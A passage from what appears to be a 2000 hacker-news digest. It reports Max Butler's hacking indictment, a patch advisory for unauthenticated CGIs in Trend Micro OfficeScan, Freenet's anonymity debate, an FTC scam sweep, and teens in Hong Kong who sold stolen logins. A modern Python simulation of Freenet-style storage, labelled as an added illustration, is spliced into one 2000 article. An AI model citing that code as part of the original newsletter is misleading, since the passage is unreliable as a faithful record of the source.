Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but ``not totally surprising.'' Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxson had filed about the invasions, Paxson said. @HWA 68.1 KYXSPAM: More on Max Vision. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Dragos (email) Further info from Dragos Ruiu and the Kyxspam world domination conspiracy url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html Ex-FBI source charged with hacking SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a confidential FBI source on computer hackers has been charged with allegedly breaking into computer systems belonging to NASA, the military and the U.S. departments of energy, defense and transportation, the U.S. Attorney's office said. Max Ray Butler, 27, also known as Max Vision, was due to appear in court on Thursday to face charges of breaking into and damaging computers as well as possessing the passwords of customers of California Internet service provider Aimnet. The indictment's 15 counts carry fines ranging from $5,000 up to $250,000 and jail terms totaling more than 50 years in prison, said officials at the U.S. Attorney's office in San Francisco. A Federal Bureau of Investigation affidavit filed to support a search of his home showed Butler, of Berkeley, Calif., was a confidential source for FBI agents tracking computer crimes before authorities began their 22-month investigation of him in May 1998. Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to authorities in Oakland. He was scheduled to attend a bail review hearing on Thursday in U.S. District Court in San Jose. The arrest comes amid growing concern over a number of recent high-profile computer hacker attacks.
But authorities said there is no connection between Butler and the "denial-of-service" attacks in early February that temporarily cut off customers to some of the Web's biggest sites, including Yahoo!, eBay , Amazon.com and E-Trade. "There are no allegations related to denial-of-service attacks but we would characterize this as a serious case," said U.S. attorney Ross Nadler, chief of the office's newly created Computer Hacking and Intellectual Property unit. Lawyers for Butler could not be reached for comment. The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation after several U.S. Air Force computer systems around the country were attacked in May 1998, although it was unclear when Butler became their focus. Butler is accused of hacking into computers belonging to the U.S. Department of Energy's Argonne National Laboratories in Illinois and the Brookhaven National Laboratory in New York; NASA's Marshall Flight Center in Alabama; the office of the Secretary of Transportation in Washington, D.C.; the office of the Secretary of the Department of Defense in Washington, D.C.; and unspecified facilities of the Department of Defense, and IDSoftware of Mesquite, Texas. © 2000 Reuters Limited. All rights reserved. -=- From: Dragos Ruiu To: <*> Sent: Thursday, March 23, 2000 2:51 PM (Hmmm.... thanks Ken for the head's up. I am also in agreement: I don't know any of the details of the incident, but I do know that Max has been a valuable resource and has contributed enormous amounts of effort and knowledge to the entire computer security field. I hope that alone is of some mitigating consideration... --dr) Berkeley man indicted, charged with hacking government computers Copyright © 2000 Nando Media Copyright © 2000 Associated Press SAN FRANCISCO (March 23, 2000 8:20 a.m.
EST http://www.nandotimes.com) - A suspected computer hacker appeared in court for the first time Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, federal prosecutors said. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in Tuesday. Butler's attorney did not return a telephone call seeking comment. -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com -=- From: Dragos (I guess one of the interviews on radio ran this morning. This showed up on a local (MyBC) news page too, funny... I don't remember giving that quote to them. But out of all the negative light they could have shone I'm happy with the way it was handled. --dr) url: http://www2.mybc.com/bc/news/fs.cfm?id=172752 Friday , Mar 24, 2000 Guest speaker busted VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled to speak at a Vancouver conference has been arrested by the FBI. Max Butler is charged with hacking into computers and destroying information. One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com, says that Butler was very well known among those in the information technology sector. 
"He ran an intrusion database, kind of like a big listing of signatures that people use towatch for hackers intruding into their network, and it was quite a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites use his database as a way of protecting their networks." Ruiu is now scrambling to find a replacement for Butler. The conference runs May 10-12. -=- @HWA 69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow The Korean Advanced Institute of Science and Technology (KAIST) will conduct a 'hacking contest'. the contest is set to start in June and will offer 100 Million Won in prize money for defeating a firewall. (If they really expect to get anything out this other than publicity they are sadly mistaken.) Chosun http://www.chosun.com/w21data/html/news/200003/200003220527.html KAIST to Hold Hackers Contest An international hacking contest will be held under the auspices of the Korean Advanced Institute of Science and Technology (KAIST) it was announced Wednesday. The Information Protection Education Research Center of the institute which formally opened the same day said that it will inject W300 million to host the First World Information Protection Contest (WIPC) in June. The contest will have hackers attempt to break into a firewall the center has built. A total of W100 million prize money is prepared for the event, which aims to find out the international standard of hackers and to test the capacity of Korean information protection technology. (Sim Jae-yool, jysim@chosun.com) @HWA 70.0 HNN:Mar 24th:Rack Mount Your iMac ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Found on Slashdot This has been posted elsewhere it is just to cool not to link to. Who would have ever thought of hacking an iMac into a rack-mount? Definitely a cool hardware hack. 
The iMac Rack-Mount Project http://imac.pointinspace.com/ (Surf to the URL homeboyie! pics and plans available for this kewl hack, someone found a use for the iMac?? - Ed) @HWA 71.0 HNS:Mar 24th:SECRETS STOLEN ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:57 PM British police said today they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. Link: Yahoo! http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html Friday March 24 10:18 AM ET British Intelligence Laptop Stolen at Station LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station. ``I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station),'' said a government official who declined to be identified. ``The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material.'' The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat. A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened. ``We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information,'' he said. 
Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. ``You can certainly say they've been tightened since this incident,'' he added.

The Sun newspaper said a squad of 150 police were working around the clock to catch the thief.

Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result.

The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas.

@HWA

72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS (Help Net Security) http://www.net-security.org/

by BHZ Friday 24 March 2000 on 5:43 PM

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS).

Link: Bugware
http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085,

Patch available for OfficeScan vulnerability

Posted to BugTraq on March 24, 2000
Security Focus BugTraq ID: 1057
Posted: March 22, 2000

Summary
=======

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrators to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on the desktops.

Issues
======

Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including the uninstall command - to OfficeScan clients.

In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console.

Implementation
==============

Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS).

After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as an administrator by NTFS security. This patch also prevents hackers who sniff for the OfficeScan management console password over the network from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication.

Affected Software Versions
==========================

Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5

This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS.

Patch Availability
==================

OfficeScan Unauthenticated CGI Usage patch can be downloaded from:
http://www.antivirus.com/download/ofce_patch.htm

More Information
================

Please see the following references for more information related to this issue.

- Trend Micro Security Bulletin:
  http://www.antivirus.com/download/ofce_patch_351.htm

- Frequently Asked Questions: Trend Micro Knowledge Base
  http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm

Acknowledgements
================

Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers.

@HWA

73.0 HNS:Mar 24th:PRIVACY ISSUES
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 5:32 PM

The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications.

Link: FCW
http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp

COMMENT

Privacy, security on the Web require business know-how

FCW's Dot-gov Thursday column
BY Rich Kellet
03/23/2000

The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. We worked through the usual issues of defining technology Webmasters and content Webmasters.
As we moved from the discussion of specialists to the issue of World Wide Web managers, an interesting perspective emerged from our discussions. Anecdotes and informal surveys are showing that about half of the Webmaster community works in mission-oriented program offices, which are not information technology organizations. This led to a discussion of the difference between managers in program organizations and managers in technology organizations. Web managers in program organizations tend to be business managers and Web managers in IT organizations tend to be technology managers. The conclusion of this discussion was to define a "breed" of Web manager under an IT series that is a technology manager or "Web technology manager."

So, what about the concept of a classification for a Web business manager? I asked the group if anyone knew of a classification for business managers in the federal government. To my surprise, there does not appear to be one.

It is important to pause at this point and consider what this means. Individuals who obtain business degrees, undergraduate or higher, have qualifications in an area recognized by the private sector as a unique skill and a profession in its own right. These skills are essential to running large programs that deliver the government’s products and services to the public or other agencies.

When I developed the top skill areas that a federal Web manager needs so that the Webmaster can deliver programs online, to my own surprise, most of the required skills originated from business skills, such as accounting and financial management and budgeting.

As I looked across government, I found surprisingly little information on what it means to run a business in the federal government context. There is plenty of information on, for instance, project management, but managing a project is not running a business. There is plenty of information on policy, but carrying out policy is not running a business. There is plenty on management, but management skills are not the only skills required to run a business. Courses in small business or college programs in business administration provide samples of the curriculums that define the skills needed to run a business.

Running a business over the Web in government is about understanding, integrating and applying principles and processes related to leadership, culture, business processes and components, management, policy, and technology into a functioning organization that delivers a set of products and services to the public or other agencies.

The issues of privacy and security are difficult to incorporate into Web sites because they challenge our abilities as business managers. Privacy and security are not "modules" you can buy off the shelf. It is not solely a technology issue, a people issue or a system issue. Privacy and security are "embedded and threaded" throughout the business processes, the organization’s working knowledge and the supporting technology infrastructure. At each level of the architecture and in the operations of the business, people and assets (routers, servers, operating systems and other components), Webmasters must incorporate privacy and security concepts and solutions.

To solve privacy and security requires a commitment to re-inventing business processes, developing the organization’s business and technology skills, and improving the underlying infrastructure. This is the stuff of a Web business manager. This is far beyond just "plugging holes" in operating systems or applications. Solving privacy and security is an enterprisewide issue that requires Web business leaders working with other business leaders in the agency.

With the Web becoming the central construct for delivering products and services, the government is going to need Web business managers. We have many now, and we need to continue to grow this portion of the work force.

So, where does that leave us? Not surprisingly, it is a business decision to decide whether to solve these issues by funding them appropriately, to develop business processes that incorporate privacy and security, and to build and continuously improve our organizational knowledge for putting in place privacy and security solutions. We can spend a lot of time chasing privacy or security holes, or solve the problem more efficiently and in less time by looking at the whole business.

--

Kellet is founder of the Federal Web Business Council, co-chair of the Federal Webmaster Forum, and is director of GSA’s Emerging IT Policies Division.

@HWA

74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:34 AM

Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday.

Link: ZDNet
http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html

Authorities target online scammers

By Margaret Kane, ZDNet News
03/23/2000 10:22

Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday.

More than 1,600 sites were uncovered in the "Get-Rich-Quick.con" program, one of several "surfs" the agency conducted looking for problems and crimes on the Net. The latest sweep hooked up law enforcement officials across state and national borders and involved hundreds of researchers who scoured the Net for scam artists.

Many languages, one voice

"We want them to know that the borderless Internet marketplace is not a free zone for fraud," said Jodie Bernstein, director of the FTC Bureau of Consumer Protection. "Though we speak different languages on the subject of Internet fraud, we speak with one voice.
Our message is: Con artists will not threaten the safety of the Net."

'We're going to run them out of town, and run them off the Web' - Drew Edmondson, Oklahoma attorney general

Some of the schemes promised users rewards such as "surf the Net and earn $100 an hour," he said. Authorities also found a variety of pyramid schemes, outrageous product claims and outright fraud.

The sites are sent e-mail warnings, and documentation of the sites is provided to law enforcement agencies in the various jurisdictions, which will be able to further investigate and press charges, if necessary. Bernstein said the agencies could begin filing charges in June or July.

Calling out the cyberposse

"As an old prosecutor I'm looking forward to Phase Two. Once we've investigated, as the old sheriff would do, we're going to run them out of town and run them off the Web," said Drew Edmondson, Oklahoma attorney general. "And where appropriate we'll put them in jail."

It came as no surprise to speakers at Thursday's news conference that con artists have migrated onto the Web. About half of the U.S. Postal Service's mail fraud investigations begin as online solicitations, said Lawrence Maxwell, USPS inspector in charge of fraud, prohibited mailings and forfeiture investigations.

It's easy for con artists to target consumers "in an age dominated by a 'Who Wants to be a Millionaire' mentality," said Richard Walker, enforcement director for the Securities and Exchange Commission.

@HWA

75.0 HNS:Mar 24th:FEARS OF FREENET
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:30 AM

A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes.

Link: Computer Currents
http://www.currents.net/newstoday/00/03/24/news5.html

Daily News

Freenet Raises Security Fears

By Martin Stone, Newsbytes
March 24, 2000

A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes.

A Reuters report today said a New Scientist magazine article on the Freenet program, which was created by Edinburgh University graduate Ian Clarke and others to make tracing file originators impossible, thereby giving dissidents in countries without free speech a voice, could be misused by those with sinister designs.

The report stated that the Internet Watch Foundation, an independent body monitoring Web sites in Britain, fears the decentralized system could make policing the Net and tracking down computer crimes even more difficult.

"There is clear potential for misuse by criminals, terrorists and pedophiles," Roger Darlington, chairman of the foundation, told the weekly magazine in its latest issue, Reuters reported.

Users of Freenet are difficult to track down because files do not contain a unique Web address and are distributed on computers belonging to Freenet members. To retrieve a file, users enter the key, Reuters said.

According to Clarke, a single computer user cannot be held responsible for Freenet files because the originator cannot be traced. "It's perfect machine anarchy," he is quoted as saying. "No single computer is in control."

Reported by Newsbytes.com

@HWA

75.1 Anonymous net access aiding and abetting online criminals?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Dragos Ruiu

url: http://www.wired.com/news/technology/0,1282,34768,00.html

Alternative Net Protects Pirates

by Leander Kahney
3:00 a.m. 8.Mar.2000 PST
Open-source advocates are developing an alternative publishing network that promises to provide true anonymity in sharing documents and files over the Internet. But in addition to protecting free speech, the new system also could be a boon for multimedia pirates.

Freenet is an open-source file-transfer system similar to the Web for sharing digital content such as HTML pages and MP3 music files. It will be run by connected clusters of servers or node stations that could in turn be run on almost any PC connected to the Internet.

But unlike the Web, Freenet has no centralized administrative infrastructure of domain name servers (DNS) and IP addresses that can be used to track users. Hosting and replicating documents and files requires that Freenet backers volunteer their time and resources.

Because Freenet aims to be anonymous, secure, and without centralized control, it would make it almost impossible to trace people who post content -- legal or otherwise -- onto the network.

"My primary motivation was to make it very difficult to censor information," said Ian Clarke, an Irish programmer who designed the system. "With the Internet there's the potential to censor and monitor people to a degree that's never been possible before. I wanted to develop the technology to make this impossible."

Clarke started work on Freenet 18 months ago as a graduate student in artificial intelligence at Edinburgh University. He had been outraged by the Australian government's proposal to introduce sweeping censorship laws, which went into effect in January.

Clarke hopes to launch the first public version in the spring, but he said the system is still pretty rough. The server is nearly finished, but so far there are no browsers, or clients, to make the network easy to use.

Freenet software will be released under the GNU public license, which will allow anyone to freely distribute and change the source code. The system is being written in Java by about a dozen programmers internationally. They have never met nor even spoken over the phone -- all communication is by email, Clarke said.

Both authors and readers can choose to be anonymous if they so wish, Clarke said. Like the Web, the network is navigated by a client, or browser. He said it will even be difficult to determine if someone is running a Freenet server and what information is being stored on it.

Alex Fowler of the Electronic Frontier Foundation said that while he generally supports anti-censorship tools, Freenet could create as many problems as it solves.

Fowler said that Freenet could be a useful tool in countries like Singapore or China that censor the Net or quash free speech. But he doesn't like the idea that you wouldn't be able to remove sensitive information -- such as someone's medical records.

"There's no way to tell if a project like this will actually take off," he said. "It's certainly going to raise some questions with a whole lot of people. Not just copyright holders, but governments too."

Patrick Ball, deputy director of the Science and Human Rights Program with the American Association for the Advancement of Science, said tools like anonymizers, strong cryptography, and Freenet tend not to help activists who are not already under surveillance because using them is in itself suspicious and tends to alert the authorities.

"I'm for any application that protects dissidents," he said. "But there's a higher order problem that's very difficult to get around, and that's by using these tools you draw attention to yourself."

Although Clarke designed Freenet to protect free speech, he thinks that the safeguards they are building in to make it difficult to track down those who distribute content could lead to its notoriety as a vehicle for copyright piracy.

The system was designed to make it impossible to find out where files are physically stored. Information posted to the network is stored on multiple servers simultaneously, making it difficult to remove a file. In fact, Clarke said any attempt to remove information causes it to be copied to other servers on the network.

The only way to remove information is to disable the entire network, which may prove difficult if it becomes popular and is running on thousands of PCs all over the globe.

However, Clarke said the network cannot be guaranteed to permanently store information. Only popular files survive for any period of time. Older, unpopular files would be overwritten by more popular ones.

"As a project we don't want to be labeled as hackers who distribute warez or copyrighted material," he said. "The purpose of Freenet is to promote freedom of information, but there is an inevitable consequence there that it might lead to violation of copyright law."

"The potential for protecting freedom of speech is more important than protecting copyright, which is an economic tool," Clarke added.

Clarke noted that Freenet can be functionally identical to Napster, the wildly popular network for sharing music online. But while the Recording Industry Association of America is currently seeking a court order to shut down Napster's central servers, it would be almost impossible to disable a Freenet network running on machines all over the world.

"Because it's decentralized no one can be held responsible for it," Clarke said. "Once it's released there's no point coming after me because there's nothing I, nor anyone else, can do to shut it down."

Eric Sheirer, a music technology researcher at MIT's Media Lab, said Freenet is an interesting experiment, but said it would likely be used only by a small community of pirates and "privacy nuts."

"If it is adopted, it will be adopted by people who want to exchange illegal information and by people who are rabid about privacy and security, which is a relatively small universe," Sheirer said.
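The storage behaviour the two Freenet articles describe (files fetched by key rather than by host, copies multiplying as a file is requested, unpopular files being overwritten, and a single node's deletion not removing the file) in a toy simulation. This is an added illustration, not Freenet's own code; the ring of nodes, the least-recently-used datastore, the SHA-256 content key and the cache-on-the-return-path rule are assumptions of the model, not details taken from the articles.

```python
import hashlib
from collections import OrderedDict
from typing import List, Optional


def content_key(data: bytes) -> str:
    """Key under which a file is published and later requested (assumed: SHA-256 of the content)."""
    return hashlib.sha256(data).hexdigest()


class Node:
    """One participant's server with a small, bounded datastore (toy model, not Freenet's)."""

    def __init__(self, name: str, capacity: int) -> None:
        self.name = name
        self.capacity = capacity
        self.store: "OrderedDict[str, bytes]" = OrderedDict()  # least recently used entry first
        self.next: Optional["Node"] = None  # single outgoing link; nodes are wired into a ring

    def _cache(self, key: str, data: bytes) -> None:
        """Keep a copy, overwriting the least recently used entry when the store is full."""
        if key in self.store:
            self.store.move_to_end(key)
            return
        if len(self.store) >= self.capacity:
            self.store.popitem(last=False)  # this is how an unpopular file disappears
        self.store[key] = data

    def insert(self, data: bytes, hops: int) -> str:
        """Publish data on this node and on the next `hops` nodes; returns the key."""
        key = content_key(data)
        node: Optional[Node] = self
        for _ in range(hops + 1):
            if node is None:
                break
            node._cache(key, data)
            node = node.next
        return key

    def request(self, key: str, hops: int) -> Optional[bytes]:
        """Fetch by key, forwarding up to `hops` times; every node on the path caches the answer."""
        if key in self.store:
            self.store.move_to_end(key)  # a hit marks the file as recently wanted
            return self.store[key]
        if hops == 0 or self.next is None:
            return None
        data = self.next.request(key, hops - 1)
        if data is not None:
            self._cache(key, data)  # reading a file spreads it further
        return data

    def remove(self, key: str) -> None:
        """A node can only drop its own copy; the copies held elsewhere are out of its reach."""
        self.store.pop(key, None)


def build_ring(size: int, capacity: int) -> List[Node]:
    nodes = [Node(f"node{i}", capacity) for i in range(size)]
    for i, node in enumerate(nodes):
        node.next = nodes[(i + 1) % size]
    return nodes


def holders(nodes: List[Node], key: str) -> int:
    """Number of nodes currently storing a copy of `key`."""
    return sum(1 for node in nodes if key in node.store)


def demo() -> dict:
    """Constructed scenario: six nodes with two storage slots each."""
    nodes = build_ring(6, capacity=2)
    origin = nodes[0]
    popular = origin.insert(b"constructed: a widely requested document", hops=1)
    unpopular = origin.insert(b"constructed: a document nobody asks for", hops=1)
    for reader in nodes[3:]:  # readers on the far side of the ring want the popular file
        reader.request(popular, hops=5)
    origin.insert(b"constructed: something newer", hops=0)  # origin is full: LRU drops `unpopular`
    origin.remove(popular)  # the author tries to withdraw the popular file at its origin
    result = {
        "popular_holders": holders(nodes, popular),      # node1, node3, node4, node5
        "unpopular_holders": holders(nodes, unpopular),  # only node1 still has it
        "origin_has_unpopular": unpopular in origin.store,
    }
    # The origin can still fetch the file it deleted, because node1 serves it back.
    result["popular_after_origin_removed"] = origin.request(popular, hops=5) is not None
    return result


if __name__ == "__main__":
    print(demo())
```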
Sheirer pointed out that the Web is trustworthy because of the content on certain domains, and he likes the convenience of tracking devices such as cookies that remember log-in names and passwords.

"Many of the advantages of Freenet are disadvantages to me," he said.

Nonetheless, Sheirer said the advent of Freenet and Gnapster, an open-source clone of Napster, illustrated the need for debate about copyright laws in the age of ubiquitous digital distribution channels.

"There are larger questions about the implications of these technologies," Sheirer said.

@HWA

76.0 HNS:Mar 24th:FEDERAL CIO NEEDED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:29 AM

Former Senate Year 2000 Committee Chairman Sen. Robert Bennett said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures.

Link: Computer Currents
http://www.currents.net/newstoday/00/03/24/news16.html

Federal CIO Needed for Web Security

By Brian Krebs, Newsbytes
March 24, 2000

Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, R-Utah, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures.

Speaking at a US Chamber of Commerce meeting, "Cyber Security: The Real Y2K Challenge," Bennett said that, while it is up to company CEOs to ensure the security of their own Web sites, the federal government can and should provide an overarching structure for that effort.

Bennett said the Clinton administration's Critical Infrastructure Assurance Office (CIAO) - the agency charged with coordinating the federal government's cyber security efforts - was a good start, but also highlighted a need for leadership on the issue.

"Every company has a chief information officer, and I think eventually the government would need its own CIO, maybe even at the cabinet level position," Bennett said. "But this is not going to happen quickly."

Over the past few weeks, a handful of public officials have called for a federal government CIO to coordinate the government's many efforts. Last week before the House Subcommittee on Government Management, Information, and Technology, Chairman Stephen Horn, R-Calif., pointed to the government's many security management players and asked whether there shouldn't be one entity coordinating the government's efforts.

"Y2K underscored the need for a disciplined management approach to problem solving," Horn said. "That type of commitment will be equally important as we turn to the second technological challenge of the New Year - computer security."

Horn then turned to the witnesses, asking, "Could the Koskinen model work here?"

At today's meeting, Bennett told reporters that, regardless of the model Congress ultimately chooses, he has heard from Koskinen himself on the issue.

"He told me that with regard to the Critical Infrastructure Protection program: 'You have my very best wishes, but you will do it without me,'" Bennett said.

Bennett said the responsibility for protecting the confidentiality and security of corporate information rests squarely on the shoulders of company CEOs, and those who wait for the government to step in with legislative remedies will find their sites hacked and their business secrets revealed.

"This is a CEO and survival issue, not something you leave to the techies," he said. "The reality is that if somebody decides they want to break into your company and steal your secrets, they can do that."

Bennett urged CEOs in attendance to shift to the mode of urgency and cooperation that made Y2K such a non-event, and emphasized the need for lawmakers and CEOs to take a "horizontal" view of their organization and how weaknesses in their companies' systems can affect other companies on the network.

"We're not thinking horizontally enough in Congress and industry," Bennett said. "Nobody's interested in stovepiping: I don't care if your company is secure or not, but I do care if you're connected to the Internet."

Bennett said that, given the hectic schedule that Congress is working at this session, it was likely that few of the many proposed bills to address cyber security would pass this year. But, he said, the bills were necessary to keep the dialogue going.

Reported by Newsbytes.com, http://www.newsbytes.com

Arescom Provides DSL For Chunghwa Telecom
03/23/00

HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily. Broadband provider Arescom has recently been awarded a major business contract for 78,000 digital subscriber lines (DSL) in partnership with one of Taiwan's wireless service providers, Tecom.

The contract includes the supply and installation of Arescom's NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the NetDSL 1000 IP (Internet Protocol) router. Implementation is expected to start in May and Arescom is partnering with Nokia for DSLAM products.

NetDSL 1000 can support up to 253 users through a hub. It has router capabilities already built in. The NetDSL 800 ADSL modem provides Internet access and bridging functions through Ethernet and USB (Universal Serial Bus) interfaces.
Reported by Newsbytes.com

@HWA

77.0 HNS:Mar 24th:DETERRENT SENTENCES
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 1:45 AM

Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong.

Link: SCMP
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp

Wednesday, March 22, 2000

Teen hackers face deterrent sentences

ELAINE PAK LI

Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong.

One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit.

At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges.

Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kinds of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions.

"These criminal activities should be nipped in the bud and a deterrent sentence must be imposed."

All the offences took place between March 1998 and May last year.

David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate.

The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500.

The three were aware that the information they obtained was acquired illegally, the magistrate was told.

Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders.

Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two.

Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88.

Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence.

Po admitted a further three charges of criminally damaging the computers of three users.

@HWA

78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 8:32 PM

